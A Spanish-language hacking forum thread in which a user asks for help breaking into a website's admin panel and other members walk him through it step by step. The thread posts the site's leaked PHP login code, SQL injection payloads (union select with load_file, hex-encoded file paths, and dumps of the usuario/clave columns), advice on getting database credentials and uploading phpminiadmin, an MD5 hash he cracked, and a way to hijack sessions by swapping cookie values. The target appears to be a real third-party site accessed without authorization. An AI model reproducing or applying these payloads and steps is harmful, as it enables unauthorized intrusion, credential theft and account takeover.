Ayuda Mmm...

[Wifox]

Estaba intenta ingresar una web solo por el afan de aprender xD

Me ayude con un video de youtube...

Pero al cargar el archivo intranetapp/admin/index.php por medio de load_file(...

me manda lo siguiente

Código [Seleccionar] Expandir

// Carga el archivo de definiciones
include_once ('_conexion.php');
$error = "";
setcookie("s_usuarioyo[un]");

if (isset($_POST["user"])){
$query = "select * from usuarios where usuario = '$_POST[user]'";
$result = mysql_query($query, $link);
if (mysql_num_rows($result) == 0) {
$error = "El Usuario No Existe"; }
else {
$rs = mysql_fetch_array($result);
if ($rs["clave"] != md5($HTTP_POST_VARS["pass"])) {
$error = "Password Incorrecto"; }
else {
if ($rs[estado] == '0') {
$error = "Usuario Desactivado"; }
else {
$sql2 = "SELECT max(codigo) as maximo from auditoria";
$results = mysql_query($sql2,$link);
$rs2 = mysql_fetch_array($results);
$nucod=$rs2[maximo]+1;
$nucod=str_pad($nucod,4,"0",STR_PAD_LEFT);
$fechasesion=date("Y/m/d");
$horainicio=date("h:i:s");
$sql2 = "insert into auditoria (codigo,usuario,fecha_sesion,hora_inicio) values ('$nucod','$HTTP_POST_VARS[user]','$fechasesion','$horainicio')";
mysql_query($sql2,$link);

session_start();
setcookie('s_usuarioyo[un]', $HTTP_POST_VARS["user"]);
setcookie('s_usuarioyo[ut]', $rs[tipousuario]);
setcookie('s_usuarioyo[nc]', $nucod);
if ($rs[tipousuario] == 'o') {
header("Location:padron.php");}
else {
header("Location:padron.php");}
}

}
}
}

if ($_GET[salir]!=""){

$horafin=date("h:i:s");
$sql2 = "update auditoria set hora_fin='$horafin' where codigo='$_GET[salir]'";
mysql_query($sql2,$link);

}

?>

se que la tabla de usuario es usuario xd pero la password nose

entonces si me pudieran ayudar xd

Pd: union select 1,2,3,4,load_file(0x433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f696e6465782e706870),6,7,8,9,0/*

[Azielito]

Ya tienes como cargar archivos, carga ahora "_conexion.php"

Código [Seleccionar] Expandir

433a2f77616d702f7777772f68746d6c312f6172636869766f732f696e7472616e65746170702f61646d696e2f5f636f6e6578696f6e2e706870

Para ver usuario y contraseña de la base de datos, y luego intenta conectarte a la base de datos via remoto, si no se puede intenta subir el phpminiadmin para entrar a la base de datos '_'

[WHK]

union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*

Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user

[08l00D]

se que la tabla de usuario es usuario xd pero la password nose

La tabla de usuarios es usuarios no usuario.. usuario es el nombre de la columna igual que clave...
WHK ya te dio la inyeccion completa asi que lo unico te toca sacar el username y la password en md5...

solo una cosa si tienes varios usuarios admin, y quieres ir viendo todos en ves de limit podes usar group_concat(usuario,0x3a,clave) ...

Saludos..

[Wifox]

union select 1,2,3,4,usuario,clave,7,8,9,0 from basededatos.usuarios /*
donde basededatos es el nombre de la base de datos que sacas con
union select 1,2,3,4,database(),6,7,8,9,0 /*

Si te limita a una sola columna le vas dando limit 1 y vas seleccionando user por user

see me resulto pero hay un problema, creo que me manda la clave md5 

a95238df9190e26ce56f7f95bc51d229

el usuario no tiene problemas, no saben de un crack de md5?

[Wifox]

vengo denuevo xd

la password era "holitas" pero cunado la probe me decia usuario desactivado

entonces no se puede?

[WHK]

entra como un usuario normal y cheka tus cookies, reemplaza tu pass normal por el pass del otro usuario, no necesitas crackear nada..
por ejemplo si tu cookie es:

id:1:pass:hgfdf5465df465df4g86f

entonces sacas los datos de la otra persona y reemplazas tus datos por los de el y ya, refrescas el navegador y ya tomaste poder de su sesión.